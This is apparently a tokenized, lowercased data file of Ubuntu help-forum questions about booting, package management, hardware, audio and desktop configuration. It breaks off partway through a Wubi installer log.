231098	windows 8 installed ubuntu 12.10 boots straight to windows 8	i installed ubuntu 12.10 on my new windows 8 dell inspirin and would like to set up a dual boot . however , when i restarted , it just went straight to windows 8 without giving me a grub screen with options to start ubuntu . i have n't had luck with easybcd or the bootrepair utility . any idea how i can get a dual boot working ?
231102	can not install ubuntu to acer aspire one 756 ( intel dual core 847 , 2 gb ram )	after deciding to install ubuntu ( 12.04 ) on a newly bought netbook ( acer aspire one 756 with intel dual core 847 and 2 gb ram , linpus linux pre-installed ) , i have had trouble getting it done . i have created a bootable usb stick witch ubuntu 12.04 ( which works fine for my desktop machine ) with pendrivelinux . however , i am not able to boot from that usb stick . i am aware of a similar case ( http : //askubuntu.com/questions/196831/acer-aspire-one-756-with-pentium-b967 ) , however the solution there ( switch boot mode to `` legacy '' in bios ) does not work for me : there simply is no adjustable `` boot mode '' in the bios . yes , i really tried hard to spot it ! i can change the boot order so that it has my usb stick on the top of the list , but it wo n't boot from the usb stick anyway . hopefully , i have not overlooked any answers when searching for a solution . apart from the question i mentioned above , i could not find a fitting thread . any help with this matter would be greatly appreciated . thanks in advance ! edit : for me the issue is solved in so far as i managed to install ubuntu 12.10 ( see comment below ) .
231103	`` systemerror : e : syntax error /etc/apt/apt.conf.d/70debconf:4 : extra junk at end of file '' causing package manager to break	i have a problem with ubuntu software center . when i try to launch it from the dock the icon blinks and then closes . if i try to launch it from terminal i get this message . gksarkis @ ubuntu : ~ $ gksudo software-center ( gksudo:2919 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksudo:2919 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksudo:2919 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( gksudo:2919 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , file `` /usr/bin/software-center '' , line 44 , in < module > from softwarecenter.utils import executiontime file `` /usr/share/software-center/softwarecenter/utils.py '' , line 682 , in < module > from softwarecenter.db.pkginfo import get_pkg_info file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 2 , in < module > from debfile import debfileapplication file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 21 , in < module > from apt import cache file `` /usr/lib/python2.7/dist-packages/apt/__init__.py '' , line 35 , in < module > apt_pkg.init ( ) systemerror : e : syntax error /etc/apt/apt.conf.d/70debconf:4 : extra junk at end of file sarkis @ ubuntu : ~ $ also when i try to install a software from terminal i get this message . sarkis @ ubuntu : ~ $ sudo apt-get cheese [ sudo ] password for sarkis : e : syntax error /etc/apt/apt.conf.d/70debconf:4 : extra junk at end of file sarkis @ ubuntu : ~ $ what should i do ? thanks in advance for your help . *there is a red button at the top bar that displays : an error occurred , please run package manager from the right-click menu or apt-get in a terminal to see what 's wrong . the error message was 'unkown error ' : ' ( e : syntax error /etc/apt/apt.conf.d/70debconf:4 : extra junk at end of file ) ' http : //pastebin.ubuntu.com/1453196/
231105	is there a simple way to diagnose unity performance issues ?	the unity dash and hud are slow to open , sometimes freezing the system for up to four seconds when i first hit the alt or super keys . is there a simple way to find out where the time is going ? the folks in # ubuntu-unity advised that i could run valgrind -- tool=callgrind compiz -- replace to generate a profile of the application , however i want a simpler place from which to start troubleshooting .
231106	ubuntu 12.10 core different frequencies	there is a little problem with my cpu , i found some tutorials , how to install avant windows manager , i wanted to change my cpu frequency , i thought it works , but it works only for one core . my cpu is an intel i5 , with 2 cores and 4 threads . so i used these commands to find out whats going on watch -n 1 cat /sys/devices/system/cpu/cpu*/cpufreq/scaling_cur_freq cpu*= cpu0 frequency = full , cpu1 frequency = 1,2ghz , all other cpus are 1,2ghz too . any idea how to `` repair '' it ?
231108	nautilus seems to be very slow only when i use the `` faenza '' theme	i 'm using gnome-shell and all seems to be good but i 've only one problem . nautilus seems to be very slow only when i use the theme `` faenza '' , with other theme is all great . in particular nautilus is slow when switching from one nautilus window to another the gtk is slow to load and i have to wait about 1-2 seconds before the right colours are shown . how can i fix it ? has anyone had problems like this ? i 'm using ubuntu 12.10 , gnome-shell 3.6.2 and nautilus 3.6.3 .
231109	how to make ubuntu alert me visually when the battery is critical ?	i am using ubuntu 12.04 and whenever i disconnect it from power supply the panel battery icon shows me the remaining time at regular interval but it doesnot make an alert when the battery runs out of juice . i am in need of a solution if the battery turns critical it can show me an visual alert , notification or even a sound so that i do not have to monitor the remaining time regularly
231118	managing kile installation in ubuntu 12.04	after installing 12.04 ubuntu i tried to install kile but when i was trying to install kile , it showed that `` failed to download package file . check your internet connections '' . but my internet is working properly even i can download updates available . how can i solve this problem ? still trying to install it but it says `` failed to download package files .check your internet connection . , failed to fetch http : //bd.archive.ubuntu.com/ubuntu/pool/main/v/virtuoso-opensource/virtuoso-opensource-6.1-bin_6.1.4+dfsg1-0ubuntu1_i386.deb size mismatch `` there is no problem in internet browsing so where is the problem ? ?
231121	how can i check that gcc is installed correctly ?	i have installed gcc with apt-get . how can i check that it is installed correctly and which version ?
231122	wine foobar2000 multimedia hotkey keybindings	i 've recently moved to ubuntu from windows , and the very only thing i could n't find an acceptable replacement to was foobar2000 . while there are plenty of awesome audio players around in the ubuntu world , i could n't settle for one of them to replace foobar2k . so i decided to install it ( version 1.1.18 ) in my ubuntu gnome remix 12.10 64 bits through wine ( 1.4.1 amd64 ) , and to my great surprise ... the result was excellent , better than expected after reading the app review in the winehq database ! the only thing that i found does n't work properly , is the multimedia hotkey keybindings . i have a dell studio 1745 laptop with a couple of multimedia keys ( mute , volumedown/up , playpause etc ) ; while they are perfectly recognized in standard ubuntu apps ( gmusicbrowser , foobnix got them ) , i could n't find a way to have foobar2000 react to them through wine ( with or w/out focus on f2k window ) . i 've tried to follow instructions given at http : //ubuntuforums.org/showthread.php ? t=690301 but the steps from the first link do n't match with my system , and although i did find in dconf editor the right menu ( org.gnome.desktop.wm.keybindings ) , i was n't able to find a way to instruct a new shorcut for wine [ foobar2000 path ] /foobar2000.exe /next etc . is there something i should change in wine , to transmit the multimedia hotkeys hits ? thanks a lot !
231125	how do you call netbeans installed by a .sh file from the command line ?	i installed netbeans 7.2.1 from http : //netbeans.org/downloads/start.html ? platform=linux & lang=en & option=all via the .sh file but i deleted the launcher from the main menu ( alacarte ) because i wanted to move it to another section of the menu and now i ca n't run it so i would appreciate it if someone could tell me which command i could run from the terminal to run it . i 'm running 12.10 . i 've already attempted asking the question on netbeans forums but i ca n't log in so i thought i would ask it here .
231126	how can i get networkmanager to autoconnect to a openconnect vpn via nmcli without prompting for a user and password	i am trying to set up a script driven vpn connection with nmcli on lubuntu 12.10 using openconnect and networkmanager and i can not seem to get it to connect either with the saved credentials or via sudo with [ vpn ] ... . password-flags=0 [ vpn-secrets ] password=your_password as i 've seen suggested many places . any ideas on how to bypass the connect dialog ?
231127	for some reason upsmon does n't do shutdown	i use nut to monitor my ippon 800 ups . everything seems works , except shutdown . i can get ups params with upsc command : ~ > upsc ippon-800 battery.charge : 0 battery.voltage : 12.50 battery.voltage.high : 13.60 battery.voltage.low : 12.60 battery.voltage.nominal : 12.0 beeper.status : enabled device.type : ups driver.name : blazer_usb driver.parameter.offdelay : 6 driver.parameter.ondelay : 7 driver.parameter.pollinterval : 2 driver.parameter.port : auto driver.version : 2.4.3 driver.version.internal : 0.03 input.current.nominal : 3.0 input.frequency : 50.1 input.frequency.nominal : 50 input.voltage : 6.1 input.voltage.fault : 6.1 input.voltage.nominal : 220 output.voltage : 226.9 ups.delay.shutdown : 6 ups.delay.start : 420 ups.load : 6 ups.productid : 0003 ups.status : ob ups.temperature : 25.0 ups.type : offline / line interactive ups.vendorid : 06da every 5 minutes i get warnings in each terminal if power gone : широковещательное сообщение от nut @ myhost ( somewhere ) at 20:45 .. ups ippon-800 @ localhost on battery here is my configs : ~ > cat /etc/nut/ups.conf [ ippon-800 ] driver = blazer_usb port = auto desc = `` ippon back power pro 800 '' default.battery.voltage.high = 13.60 default.battery.voltage.low = 12.60 offdelay = 6 ondelay = 7 ~ > cat /etc/nut/upsmon.conf |grep -v ^ # |sort|uniq deadtime 21 finaldelay 5 hostsync 15 minsupplies 1 monitor ippon-800 @ localhost 1 nut heh-secret-password master nocommwarntime 300 pollfreq 5 pollfreqalert 5 powerdownflag /etc/killpower rbwarntime 43200 run_as_user nut shutdowncmd `` /sbin/shutdown -h +0 '' my ups just powers off my computer after about 15 minutes of beeping without executing shutdown command . how can i make nut doing shutdown ? update set powerdownflag /tmp/killpower
231130	sandy bridge + 12.10 : tricks	are there any tricks ( like boot parameter or unofficial kernel or anything ) , which would improve ubuntu 12.10 on sandy bridge with intel hd 3000 ? it is not totally bad now , but maybe there is something to do to make notebook cooler and quieter ?
231132	how to change geolocation for unity news lens results ?	i 've installed the unity news lens as per the instructions from this answer . the lens uses geolocation to provide results from local news sources . this is a great lens - except it geolocated me incorrectly . i 'm currently in wakefield , rhode island , usa , and it displays results appropriate for wakefield , west yorkshire , uk . is there a way to reconfigure the news lens 's geolocation ?
231134	anyone with compaq g60 laptop ; blind bios walk-through for a `` to vga '' first ?	one of my laptops has a broken screen . but i cant really afford to get a new one yet . just wondering if anyone has a [ g60 hp/compaq ] laptop , that you might post a key by key blind walk-through to changing to vga first , and save . i figure this would be immensely handy for the someone else too .
231138	slow ( er ) hdd performance	when watching a movie ( simple avi ) and my torrent client ( transmission ) runs simultaneously , the movie slows down . i think this is a hdd performance issue . it does not exist on windows 7/8 ( same laptop ) . my hdpharm output : /dev/sda : timing cached reads : 7666 mb in 2.00 seconds = 3834.33 mb/sec timing buffered disk reads : 290 mb in 3.01 seconds = 96.28 mb/sec what can be the problem ? it 's a hp probook 4530s and wubi 12.04
231143	12.10 extended desktop executed programs start	on 12.10 my extended desktop is just perfect ! but i cant set where to start the executed programs . their always start at the monitor , but i want to start at the laptop screen . any idea ?
231145	setting up router in ubuntu	have , * d-link modem * asus wl520 gu router ( with dd-wrt installed ) * desktop with ubuntu 10.04 would like to route the internet through my desktop , which have 2 ethernet ports . identified in linux as eth0 and eth1 . internet is connected to the eth0 and router to eth1 . i want to share the internet through the wifi router to my other wifi enabled devices . need help in setting up this configuration . thanks .
231152	do-release-upgrade -- quiet / -q no definition of what it does	does anybody know what do-release-upgrade -q actually does ? hopefully it does the upgrade without the need to interact with it , if this is the case does it overwrite configs or keep the originals ? , or does it do something else ? stephenm @ mcr-pc-29392 : ~ $ do-release-upgrade -- help usage : do-release-upgrade [ options ] options : -h , -- help show this help message and exit -v , -- version show version and exit -d , -- devel-release check if upgrading to the latest devel release is possible -- data-dir=data_dir directory that contains the data files -p , -- proposed try upgrading to the latest release using the upgrader from $ distro-proposed -m mode , -- mode=mode run in a special upgrade mode . currently 'desktop ' for regular upgrades of a desktop system and 'server ' for server systems are supported . -f frontend , -- frontend=frontend run the specified frontend -s , -- sandbox test upgrade with a sandbox aufs overlay -c , -- check-dist-upgrade-only check only if a new distribution release is available and report the result via the exit code -q , -- quiet the man page does not even mention it . do-release-upgrade ( 8 ) do-release-upgrade ( 8 ) name do-release-upgrade - upgrade operating system to latest release synopsis do-release-upgrade [ options ] description upgrade the operating system to the latest release from the command-line . this is the preferred command if the machine has no graphic environment or if the machine is to be upgraded over a remote connection . options -h , -- help show help message and exit -d , -- devel-release check if upgrading to the latest devel release is possible -p , -- proposed try upgrading to the latest release using the upgrader from ubuntu-proposed -m mode , -- mode=mode run in a special upgrade mode . currently `` desktop '' for regular upgrades of a desktop system and `` server '' for server systems are supported . -f frontend , -- frontend=frontend run the specified frontend -s , -- sandbox test upgrade with a sandbox aufs overlay see also update-manager ( 8 ) , apt-get ( 8 )
231153	is there a way to extend unity 's window placement shortcuts ?	in unity there is the way of using ctrl+super+ ( left|right ) to extend the current window eighter on left or right side . is there any way to extend this so you can place it in top_left an bottom_left ?
231160	uefi and lubuntu 12.04	community , i 'm new at lubuntu and do n't know more than a simple user - so i need someone who explains me the installation and configurations in a very simple way ( and if posible in german ? ) my problem : yesterday i bought a new laptop from hp with preinstalled win8 , amd e1-1200 and uefi-boot . i wanted to make a parallel installation of lubuntu . i managed to install lubuntu 12.04 from the cd after some changes in the boot-menu . but it is possible that it was n't a uefi-version/installation . after installing lubuntu i expected , that the computer would ask me automatically while starting with wich os ( win or lubuntu ) i wanted to work - as it does on my old computer . unfortunately it does n't work that way . than i began to search and changed in the boot options : legacy support - enabled ( loads compatibiltiy support module ) and secure boot disabled . now i can load lubuntu , if i push esc while starting the computer to get to the boot menu . then i have to manually elect `` boot from notebook hard drive '' ( csm ) . and then i come to the well known menu where i can select the os . complicated ... . unfortunatley uefi boot order has still `` higher priority than legacy boot order '' so the computer starts with the `` uefi os boot loader '' where only win8 works . i ca n't change the boot order in the way that `` boot from notebook hard drive '' ( csm ) would be at first place . with other words : i have n't found a automatical way to come to the menu . i have to go to the boot menu every time i wnat to start lubuntu . can someone help me , please ? ? ? thanks a lot .
231163	'error splicing file : input/output error ' when copying from a cd	i 'm trying to copy some files from a cd to my harddrive , but i keep getting the error : error splicing file : input/output error the files are still copying , but only at about 2.5kb/s and the cd drive does n't sound like it 's doing much . i doubt it 's a problem with filenames , since the disc appears to have been created on windows , which to me seems to be stricter about what can & ca n't go in a filename . nautilus shows the disc 's format is udf , although it also shows the disc 's size is 0 bytes ( with 0 in use ) and contains about 3mb of stuff , even though the folder i 'm trying to copy is bigger than that . what could be causing this ?
231165	use gnome , but login with kdm	i 'm trying to find a way to make the login screen a kde session in ubuntu 10.04 while maintaining a gnome session after logging in . the reason for this is to change the login screen i detest . any help on how this could be accomplished would be great . thank you .
231167	how can i upgrade from 11.04 to 12.04lts in one step with no downloads ?	i can not use the internet to update . how can i update my os without using the update manager or the internet ?
231174	making login.defs active	i am attempting to apply a new password policy on my ubuntu server 12.04.1 . i have edited the max_pass_days 30 , min_pass_days 2 , pass_warn_age 7 in /etc/login.defs . the new rules do apply to any new users i create , but how do i force it on all the current users ? i test it using a user who has not changed his password in 3 months . chage -l still shows 99999 for max_pass_days . i would rather not using chage on all the current users . thanks in advance
231176	how do i install s3tc ?	i recently installed steam on ubuntu 12.10 and when i try to load tf2 this error appears : `` required opengl extension `` gl_ext_texture_compression_s3tc '' is not supported . please install s3tc texture support
231177	another question about netflix on ubuntu	i know , the issue of netflix 's watch instantly not working on linux has been ( sort of ) handled by using wine to run firefox with silverlight installed , but that solution is n't working out so well for me . ( the wine window freezes up on attempted loading of silverlight . ) i have not come to ask for help with this , however . i have come to ask if anybody has made a `` mod '' for moonlight ( the open-source equivalent of silverlight , ) to spoof drm . i already have the user agent switcher add-on spoofing windows , and the player will load , but it never gets past the part with the blue circle . i want to know if there is a fork of moonlight that emulates silverlight . i do n't care whether the drm is real or spoofed . i 'm probably not going to be hosting illegal downloads of netflix movies anyway ( i like netflix too much to do that ; ) anyway , i do n't need a link , although that would be nice ; i just need someone to point me in the right direction .
231178	how do i report a paper cut ?	i 've seen this project called one hundred paper cuts , and i 'd like to report a paper cut , but do n't know how . can someone please tell me how to go about doing this .
231180	ubuntu 12.10 does n't start with kernel 3.7	my ubuntu 12.10 64 bit does n't start with new kernel 3.7 . i try to install the 3.6 , but they do not work too . my mother board is an asus m4n68t-m le , and i have an amd phenom ii x4 955 . they do boot , but show a lot of errors , and for leave off i need to shutdown the computer . to use the computer , i need to click in `` advanced config '' and choose ubuntu with kernel 3.5.0-19 . sorry by my english : ) and help me
231183	how do i move my ubuntu ( only ) 12.04.1 to a new disk	i 've copied it and i believe that it is now booting from the right place - but i 'm not really sure how i got there . i 'd like to : verify my ubuntu install is now booting from the new disk ( and maybe understand for sure how i did it ) . delete the other partitions ( that 's easy with fdisk - but i 'm afraid to do anything now because it got so messed up before . then expand my ubuntu partition so it has more room . ( again i know how to add blocks with fdisk but i 'm afraid to do that without some advise . from what i 've read it can get messed up easily . ) clean the junk out of the boot menu then reinstall windows 8 on the other hdd and either not let it overwrite the mbr on the drive grub2 is booting from , or just recover grub2 afterwards . 'boot-repair ' session number . http : //paste.ubuntu.com/1453284
231190	middle click will not work	i use an acer aspire one and dual booting ubuntu 12.10 and windows 7 starter . ( i do n't use the windows partition much . ) i have a usb mouse and a usb keyboard . i have been using the middle click paste up until today . actually i was using it up until just about two hours ago . nothing updated and i have n't installed anything before that time that would make it stop working ( i have n't installed anything since two days ago ) . my system froze up and i had to restart it so i know this question might be in vain but , i was wondering if there 's a way to check and see what went wrong ? or if there 's a way to get my middle click back ? i ca n't middle click anywhere , not in firefox to go to a new tab , not to close a tab , not to paste , not in empathy to paste , not anywhere as far i can find . if more information is needed let me know . i would greatly enjoy a little bit of help here . edit : yep mouse is broken .
231191	gwibber-service keeps running after uninstall	i uninstalled gwibber a couple weeks ago . however the gwibber service keeps starting every once in a while . is there any way to prevent this ?
231192	2-pass encoding with avconv	i do n't understand why the video quality with multi-pass encoding is worst than one pass ? when i do this , it is correct : avconv -i video.mpg -s 640x360 -threads auto -vcodec libxvid -b 800k -r 24 -g 300 -bf 2 -acodec libmp3lame -ac 2 -ab 128k -ar 48000 video.avi this is worst : avconv -i video.mpg -s 640x360 -pass 1 -threads auto -vcodec libxvid -b 800k -r 24 -f avi -an -y /dev/null avconv -i video.mpg -s 640x360 -pass 2 -threads auto -vcodec libxvid -b 800k -r 24 -g 300 -bf 2 -acodec libmp3lame -ac 2 -ab 128k -ar 48000 video.avi what am i doing wrong ?
231193	running `` update-grub '' does n't update grub !	when i run either sudo update-grub or sudo grub-mkconfig -o /boot/grub/grub.cfg , it proceeds as normal , but when i check /boot/grub/grub.cfg , the file is the same as before even though i have installed new oses ! i ran sudo grub-mkconfig -o /home/gabriel/desktop/test.txt , and examined the file . it says that the owner is root , and only has read permissions . furthermore , it 's the old version of my grub setup , and does n't reflect my recent install of windows 8 . are there any permissions that are incorrectly set or something ? this is very vexing . os-prober output : /dev/sda1 : windows 8 ( loader ) : windows : chain /dev/sda12 : unknown linux distribution : linux : linux /dev/sda5 : windows recovery environment ( loader ) : windows1 : chain /dev/sda6 : windows 7 ( loader ) : windows2 : chain /dev/sda8 : fedora release 17 ( beefy miracle ) : fedora : linux note : `` unknown linux distribution '' is chromiumos . this is the output of bootinfoscript .
231195	how to enable alt+right click to resize window	been looking around and ca n't see to find any information on how to enable alt+right click for window resize ? edit my mistake running unity 12.04 , i am logged in under failsafe graphics mode as i ca n't get my 590gx nvidida card to boot up without being in safe , but thats another problem . currently , my alt+click works and i can drag windows around . but i ca n't currently , alt+right-click to resize .
231196	python importerrors while trying to get a program ( found on google code ) to work	i 'm trying to install a program written in python / -- > http : //code.google.com/p/amphetype/ < -- / i did subversion checkout svn checkout http : //amphetype.googlecode.com/svn/trunk/ amphetype-read-only and tried to setup / run the program , but i am seeing importerrors like that : pm @ machina-pm : /home/pn/amphetype-read-only $ python setup.py traceback ( most recent call last ) : file `` setup.py '' , line 5 , in < module > import py2exe importerror : no module named py2exe and : pm @ machina-pm : /home/pn/amphetype-read-only $ python amphetype.py traceback ( most recent call last ) : file `` amphetype.py '' , line 10 , in < module > from config import settings file `` /home/pn/amphetype-read-only/config.py '' , line 5 , in < module > from qtutil import * file `` /home/pn/amphetype-read-only/qtutil.py '' , line 4 , in < module > from pyqt4.qtcore import * importerror : no module named pyqt4.qtcore edit : installing python-qt ( sudo apt-get install python-qt4 ) helped in getting rid of the second importerror.however program still does n't start , now it says : pm @ machina-pm : /home/pn/amphetype $ python amphetype.py no protocol specified no protocol specified amphetype.py : can not connect to x server :0 ps . readme.txt that goes with the source code sadly does n't get me very far ( author says that it was developed under windows , and the whole project seems to be abandoned now ) . i used to use that software on windows and i like it a lot , and would love to get it running on linux . edit 2 : ufff ... it works at last , moving the amphetype directory from ~/amphetype to /etc/amphetype did the trick , although i 'm not sure why ...
231198	is it possible to change the skype indicator icon ?	i 've searched high and low on my system for the image that is displayed in the skype indicator but is nowhere to be found , even the skype deb file does n't have anything like it and no other icon set changes the image . is it possible to ? at all ?
231201	audio problem ( alsa* dependencies )	running ubuntu 12.04 i have setup xmonad as described here : https : //github.com/davidbrewer/xmonad-ubuntu-conf my problem analogous to : http : //ubuntuforums.org/showthread.php ? t=1905657 mute using keyboard button , volume is muted in panel and pavucontrol . unmute using keyboard button , volume is unmuted in panel , but still muted in pavucontrol . when i unmute in pavucontrol , it is unmuted . now here is one thing i observed . when i do : sudo apt-get install alsa* , it says : the following packages have unmet dependencies : alsaplayer-esd : depends : libesd0 ( > = 0.2.35 ) but it is not going to be installed balsa : depends : libcanberra-gtk0 ( > = 0.2 ) but it is not going to be installed depends : libcanberra0 ( > = 0.2 ) but it is not going to be installed depends : libgnome2-0 ( > = 2.17.3 ) but it is not going to be installed depends : libgnomeui-0 ( > = 2.22.0 ) but it is not going to be installed crystalspace-glshader-cg : depends : libcrystalspace-1.4 ( > = 1.4.0+dfsg ) but it is not installable gnome-alsamixer : depends : libgnome2-0 ( > = 2.17.3 ) but it is not going to be installed depends : libgnomeui-0 ( > = 2.22.0 ) but it is not going to be installed libboost-signals1.48-dev : depends : libboost1.48-dev ( = 1.48.0-3 ) but it is not going to be installed conflicts : libboost-signals1.46-dev but 1.46.1-7ubuntu3 is to be installed libktpcommoninternalsprivate0 : depends : kde-runtime but it is not going to be installed liboss4-salsa-asound2 : conflicts : libasound2 e : unable to correct problems , you have held broken packages .
231210	nm-applet freeze in ubuntu 12.04	i have the same problem as network manager applet menu freezes and does not respond in ubuntu 12.04 . now , even restarting the nm-applet wo n't help . is it a bug ? i thought 12.04 would be pretty stable now . what could i do thenďź thanks !
231213	flickering monitor connected by vga to new system76	setup : new system76 lemur laptop running ubuntu unity 12.10 is connected via vga cable to a new dell ultrasharp u2312hm 23-inch monitor . symptom : the dell monitor has an annoying flicker , like high-speed waves of darkness passing over it , pretty subtle at times , but very annoying at others . the flicker seems to increase when i type or move the mouse . why i do n't think it is the dell monitor 's fault : i connected the monitor to an old dell laptop and there was no flicker . question : is there a known solution ?
231215	all menu items greyed out in golly . how to diagnose the problem ?	i tried installing golly from the package manager . everything seems to work fine , except that almost all the menu options are greyed out , disabled and unclickable . i tried with the latest version from sourceforge and have the same issue . only the `` preferences '' , `` quit '' and all the `` help '' menu options are not greyed out . this problem only seems to affect golly . i found an old bug report , which seemed to be a more specific version of this problem , but that is closed and two years old ... my question is : what can i do to diagnose the problem ? no other program seems to have this issue . no one else seems to have noticed this issue . what can i try to work out what has broken ? i am running 12.04 . the problem occurs with the version of golly in the repos and with the latest version downloaded from sourceforge .
231223	freezes on boot menu	i 'm having a small issue , which remains even after reinstalling ubuntu 3 times . each time i install ubuntu , then use it once , then restart the computer , it goes to the screen 'ubuntu / advanced setting ... ' and so on ... then it says to use the arrows to choose or press c for something else ... i ca n't move the arrows , and i do n't know why . so it freezes there and i ca n't do anything . what do you suggest ?
231229	error occured when downloading wubi 12.04	i tried to download ubuntu 12.04 , but it froze so i shut down the computer . i tried again and a window popped up saying : an error occurred : can not install into c : \ubuntu there is another file or directory with this name please remove it before continuing for more information , please see the log file log file has the following contents : 12-20 20:11 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:11 debug distro : checking whether h : \ is a valid lubuntu cd 12-20 20:11 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:11 debug distro : checking whether h : \ is a valid lubuntu cd 12-20 20:11 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:11 info root : running the installer ... 12-20 20:11 debug windowsfrontend : __init__ ... 12-20 20:11 debug windowsfrontend : on_init ... 12-20 20:11 info winuipage : appname=wubi , localedir=c : \users\peter\appdata\local\temp\pyl8002.tmp\translations , languages= [ 'en_us ' , 'en ' ] 12-20 20:11 info winuipage : appname=wubi , localedir=c : \users\peter\appdata\local\temp\pyl8002.tmp\translations , languages= [ 'en_us ' , 'en ' ] 12-20 20:12 debug winuiinstallationpage : target_drive=c : , installation_size=18000mb , distro_name=ubuntu , language=en_us , locale=en_us.utf-8 , username=peter 12-20 20:12 info root : received settings 12-20 20:12 debug commonbackend : searching for local cd 12-20 20:12 debug distro : checking whether c : \users\peter\appdata\local\temp\pyl8002.tmp is a valid ubuntu cd 12-20 20:12 debug distro : does not contain c : \users\peter\appdata\local\temp\pyl8002.tmp\casper\filesystem.squashfs 12-20 20:12 debug distro : checking whether d : \ is a valid ubuntu cd 12-20 20:12 debug distro : does not contain d : \casper\filesystem.squashfs 12-20 20:12 debug distro : checking whether e : \ is a valid ubuntu cd 12-20 20:12 debug distro : does not contain e : \casper\filesystem.squashfs 12-20 20:12 debug distro : checking whether f : \ is a valid ubuntu cd 12-20 20:12 debug distro : does not contain f : \casper\filesystem.squashfs 12-20 20:12 debug distro : checking whether g : \ is a valid ubuntu cd 12-20 20:12 debug distro : does not contain g : \casper\filesystem.squashfs 12-20 20:12 debug distro : checking whether h : \ is a valid ubuntu cd 12-20 20:12 debug distro : does not contain h : \casper\filesystem.squashfs 12-20 20:12 debug commonbackend : searching for local iso 12-20 20:12 info winuipage : appname=wubi , localedir=c : \users\peter\appdata\local\temp\pyl8002.tmp\translations , languages= [ 'en_us ' , 'en ' ] 12-20 20:12 debug tasklist : # running tasklist ... 12-20 20:12 debug tasklist : # # running select_target_dir ... 12-20 20:12 error tasklist : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 81 , in select_target_dir exception : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . 12-20 20:12 debug tasklist : # cancelling tasklist 12-20 20:12 debug tasklist : # finished tasklist 12-20 20:12 error root : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 81 , in select_target_dir exception : can not install into c : \ubuntu . there is another file or directory with this name . please remove it before continuing . 12-20 20:20 info root : === wubi 12.04 rev269 === 12-20 20:20 debug root : logfile is c : \users\peter\appdata\local\temp\wubi-12.04-rev269.log 12-20 20:20 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' c : \\users\\peter\\desktop\\wubi\\wubi.exe '' ' ] 12-20 20:20 debug commonbackend : data_dir=c : \users\peter\appdata\local\temp\pyl7c79.tmp\data 12-20 20:20 debug windowsbackend : 7z=c : \users\peter\appdata\local\temp\pyl7c79.tmp\bin\7z.exe 12-20 20:20 debug windowsbackend : startup_folder=c : \programdata\microsoft\windows\start menu\programs\startup 12-20 20:20 debug commonbackend : fetching basic info ... 12-20 20:20 debug commonbackend : original_exe=c : \users\peter\desktop\wubi\wubi.exe 12-20 20:20 debug commonbackend : platform=win32 12-20 20:20 debug commonbackend : osname=nt 12-20 20:20 debug commonbackend : language=en_us 12-20 20:20 debug commonbackend : encoding=cp1252 12-20 20:20 debug windowsbackend : arch=amd64 12-20 20:20 debug commonbackend : parsing isolist=c : \users\peter\appdata\local\temp\pyl7c79.tmp\data\isolist.ini 12-20 20:20 debug commonbackend : adding distro xubuntu-i386 12-20 20:20 debug commonbackend : adding distro edubuntu-i386 12-20 20:20 debug commonbackend : adding distro xubuntu-amd64 12-20 20:20 debug commonbackend : adding distro kubuntu-amd64 12-20 20:20 debug commonbackend : adding distro mythbuntu-i386 12-20 20:20 debug commonbackend : adding distro edubuntu-amd64 12-20 20:20 debug commonbackend : adding distro ubuntu-amd64 12-20 20:20 debug commonbackend : adding distro lubuntu-i386 12-20 20:20 debug commonbackend : adding distro ubuntu-i386 12-20 20:20 debug commonbackend : adding distro mythbuntu-amd64 12-20 20:20 debug commonbackend : adding distro kubuntu-i386 12-20 20:20 debug commonbackend : adding distro lubuntu-amd64 12-20 20:20 debug windowsbackend : fetching host info ... 12-20 20:20 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 12-20 20:20 debug windowsbackend : windows version=vista 12-20 20:20 debug windowsbackend : windows_version2=windows 7 ultimate 12-20 20:20 debug windowsbackend : windows_sp=none 12-20 20:20 debug windowsbackend : windows_build=7601 12-20 20:20 debug windowsbackend : gmt=-5 12-20 20:20 debug windowsbackend : country=us 12-20 20:20 debug windowsbackend : timezone=america/new_york 12-20 20:20 debug windowsbackend : windows_username=peter 12-20 20:20 debug windowsbackend : user_full_name=peter 12-20 20:20 debug windowsbackend : user_directory=c : \users\peter 12-20 20:20 debug windowsbackend : windows_language_code=1033 12-20 20:20 debug windowsbackend : windows_language=english 12-20 20:20 debug windowsbackend : processor_name=amd athlon ( tm ) 64 x2 dual core processor 6000+ 12-20 20:20 debug windowsbackend : bootloader=vista 12-20 20:20 debug windowsbackend : system_drive=drive ( c : hd 894380.753906 mb free ntfs ) 12-20 20:20 debug windowsbackend : drive=drive ( c : hd 894380.753906 mb free ntfs ) 12-20 20:20 debug windowsbackend : drive=drive ( d : cd 0.0 mb free cdfs ) 12-20 20:20 debug windowsbackend : drive=drive ( e : removable 0.0 mb free ) 12-20 20:20 debug windowsbackend : drive=drive ( f : removable 0.0 mb free ) 12-20 20:20 debug windowsbackend : drive=drive ( g : removable 0.0 mb free ) 12-20 20:20 debug windowsbackend : drive=drive ( h : removable 0.0 mb free ) 12-20 20:20 debug windowsbackend : uninstaller_path=none 12-20 20:20 debug windowsbackend : previous_target_dir=none 12-20 20:20 debug windowsbackend : previous_distro_name=none 12-20 20:20 debug windowsbackend : keyboard_id=67699721 12-20 20:20 debug windowsbackend : keyboard_layout=us 12-20 20:20 debug windowsbackend : keyboard_variant= 12-20 20:20 debug commonbackend : python locale= ( 'en_us ' , 'cp1252 ' ) 12-20 20:20 debug commonbackend : locale=en_us.utf-8 12-20 20:20 